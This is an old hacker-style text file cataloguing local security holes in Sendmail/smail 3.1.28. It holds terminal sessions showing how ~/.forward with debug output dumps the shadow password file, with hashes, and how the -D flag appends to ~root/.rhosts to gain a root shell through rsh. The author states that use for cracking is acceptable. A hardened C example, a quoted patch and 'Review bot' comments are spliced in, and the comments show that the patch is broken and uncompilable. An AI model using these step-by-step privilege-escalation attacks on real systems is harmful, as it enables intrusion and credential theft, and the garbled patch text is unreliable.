This is written for anyone that's interested in learning about the many security holes that are resident in many versions of Sendmail. I do not care if you use it to protect your system against others, or crack other people's systems...just don't involve me in it.
I wrote it to collate all the information on sendmail into one list for convenience and perhaps it will help some people.
I would like to thank the unknown person who started this off a long time ago....
This paper is (c) 1995, however I do not object to you including any of these in a FAQ, printed magazine, book etc... just mail me first so I know where it's distributed *:^)
Have you spotted a mistake or anything I could add? Then just add your own stuff, put yourself down on the credits and mail it to me :)
Note: This is v.01b so there are bound to be mistakes and there is a lot of other stuff to add as well....and expand it to include FTP daemon bugs?
I am extremely busy...and am only releasing it due to popular demand.
OH, please tell me what versions these work on!
Sendmail Version affected: 3.1.28, any more?
Use of ~/.forward and debug lets a local user read any file on the system.
We can just do this....
user@psyops ~> smail -bs -v20
expand_string($primary_name Smail$version ready for mail on $date,(null), (null)) called
expand_string returns psyops.warez.mil Smail3.1.28.1 ready for mail on Mon, 5 Sep 94 12:15 PDT
220 psyops.warez.mil Smail3.1.28.1 ready for mail on Mon, 5 Sep 94 12:15 PDT
expn user
[same text as before]
expand_string(~/.forward, /home/user, user) called
expand_string returns /home/user/.forward
dtd_forwardfile: opening forward file /home/user/.forward
[more of same text]
read 890 bytes
director dotforward: matched user, forwarded to root:e.fmSewuS32sfeVdsjk/Ewef:8000:0:99999:7:::
bin:*:8000:0:99999:7:::
daemon:*:8000:0:99999:7:::
nobody:*:8000:0:99999:7:::
user:e74fds.Sfdsioa8e2dsskDSx:8000:0:99999:7:::
[.....]
process_field: entry
We have a group
We have a group
process_field: error: recursive address group
550 user ... not matched
quit
221 psyops.warez.mil closing connection
To fix this, get rid of the -d and -v options for smail and add -smtp_debug to your config file.
Sendmail Version affected: 3.1.28, any more?
Calling smail with the -D flag allows you to create or append to any file on the system.
user@psyops ~> cat > ~/.forward
localhost user
^D
user@psyops ~> smail -bs -D ~root/.rhosts -v20
220 psyops.warez.mil Smail3.1.28.1 ready for mail on Mon, 5 Sep 94 12:23 PDT
expn user
250 user
quit
221 psyops.warez.mil closing connection
user@psyops ~> rsh -l root localhost tcsh\ -i
Warning: no access to tty (Bad file number).
Thus no job control in this shell.
# id
uid=0(root) gid=0(root)
Patch this by removing the -D option from smail.
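The underlying defect is that a set-uid mailer opens a path the invoking user chose (the -D argument) while still holding root's rights. As an added example, not smail's code or the author's, here is a hypothetical open_debug_file_as_user() that only ever appends to a regular, non-symlink file owned by the invoking user, so a privileged process cannot be steered into writing somewhere like ~root/.rhosts; the scratch path used by demo() is constructed for the self-check.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical hardened open for a user-supplied debug path (not smail's
 * fopen_as_user()).  Returns NULL with errno set unless the target is a
 * regular file, reached without following a symlink, owned by real_uid. */
FILE *open_debug_file_as_user(const char *path, uid_t real_uid)
{
    struct stat st;
    /* O_NOFOLLOW: a symlink planted at 'path' makes the open fail instead
     * of silently redirecting the privileged write elsewhere. */
    int fd = open(path, O_WRONLY | O_APPEND | O_NOFOLLOW | O_NOCTTY);
    if (fd < 0)
        return NULL;
    /* fstat() the descriptor we hold rather than stat() the name, so there is
     * no window between the check and the use in which the file can change. */
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_uid != real_uid) {
        close(fd);
        errno = EPERM;
        return NULL;
    }
    FILE *fp = fdopen(fd, "a");
    if (fp == NULL)
        close(fd);
    return fp;
}

/* Self-check: create a scratch file we own, then confirm the open succeeds
 * for our own uid and is refused for a constructed, mismatching uid.
 * Returns 0 when both outcomes are as expected, -1 if the scratch file
 * could not be created, 1 otherwise. */
int demo(const char *scratch)
{
    FILE *fp = fopen(scratch, "w");              /* scratch file, owned by us */
    if (fp == NULL) return -1;
    fclose(fp);
    FILE *ok  = open_debug_file_as_user(scratch, getuid());
    FILE *bad = open_debug_file_as_user(scratch, getuid() + 1); /* constructed mismatch */
    if (ok)  fclose(ok);
    if (bad) fclose(bad);
    unlink(scratch);
    return (ok != NULL && bad == NULL) ? 0 : 1;
}

int main(void)
{
    return demo("/tmp/added_example_smail_debug.txt");
}
```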
I received the following patch recently. I haven't tested it, so use at your own risk.
*** Omain.c Wed Mar 11 12:33:18 1993
--- main.c Wed Mar 11 12:59:54 1993
***************
*** 436,458 ****
}
- /*
- * change error file to debugging file from -D option, if any
- */
-
- if (arg_debug_file) {
- new_errfile =3D fopen(arg_debug_file, "a");
- if (new_errfile =3D=3D NULL) {
- write_log(LOG_TTY, "Warning: Cannot open debug file %s: %s\n",
- arg_debug_file, strerrno(errno));
- arg_debug_file =3D NULL;
- } else {
- errfile =3D new_errfile;
- fprintf(errfile, "\n%s: Debugging started: pid=3D%ld\n\n",
- program, (long)getpid());
- }
- }
/*
* read in the transport, router and director files, if needed
*
* NOTE: if queue_only is FALSE and mode is DELIVER_MAIL,
--- 436,441 ----
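Review bot: Removing this block from here is the right move: the deleted code passes arg_debug_file, a path taken straight from the user's -D argument, to a plain fopen(arg_debug_file, "a") while smail still holds its set-uid privileges, which is exactly what the ~root/.rhosts append above relies on. The new side of this hunk (--- 436,441 ----) is empty, so the hunk only deletes; make sure the -D handling is re-added later in the same patch rather than dropped outright.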
***************
*** 525,530 ****
--- 508,537 ----
if (prog_euid !=3D REQUIRED_EUID)
queue_only =3D TRUE;
#endif
+ /*
+ * change error file to debugging file from -D option, if any
+ *
+ * JMJ: Change location of this fragment to below the setuid/setgid
+ * calls to allow for use of fopen_as_user() instead of just
+ * fopen().
+ *
+ * Side effect: -D now requires full pathname to debug file
+ */
+
+ if (arg_debug_file) {
+ new_errfile =3D fopen_as_user(arg_debug_file, "a", 1, real_uid,
+ prog_egid, 0600);
+ write_log(LOG_TTY, "Warning: Cannot open debug file %s: %s\n",
+ arg_debug_file, strerrno(errno));
+ arg_debug_file =3D NULL;
+ } else {
+ errfile =3D new_errfile;
+ fprintf(errfile, "\n%s: Debugging started: pid=3D%ld\n\n",
+ program, (long)getpid());
+ }
+ }
/*
* error processing can be other than TERMINAL only for
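Review bot: The added block is missing the NULL test between the fopen_as_user() call and the write_log() warning: as written, the warning fires unconditionally, arg_debug_file is always cleared, and the following `} else {` has no matching `if`, so this will not compile. Restore the `if (new_errfile == NULL) {` line from the removed block directly after the fopen_as_user() call. Separately, the hunk lines carry quoted-printable residue (`=3D` where `=` is meant, e.g. `new_errfile =3D fopen_as_user(...)`, `pid=3D%ld`), which has to be undone before the patch can be applied.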
Sendmail Version affected: ?
Files specified in ~/.forward can be created in any directory, regardless of its permissions. (The file is still owned by the mailbox owner, however.)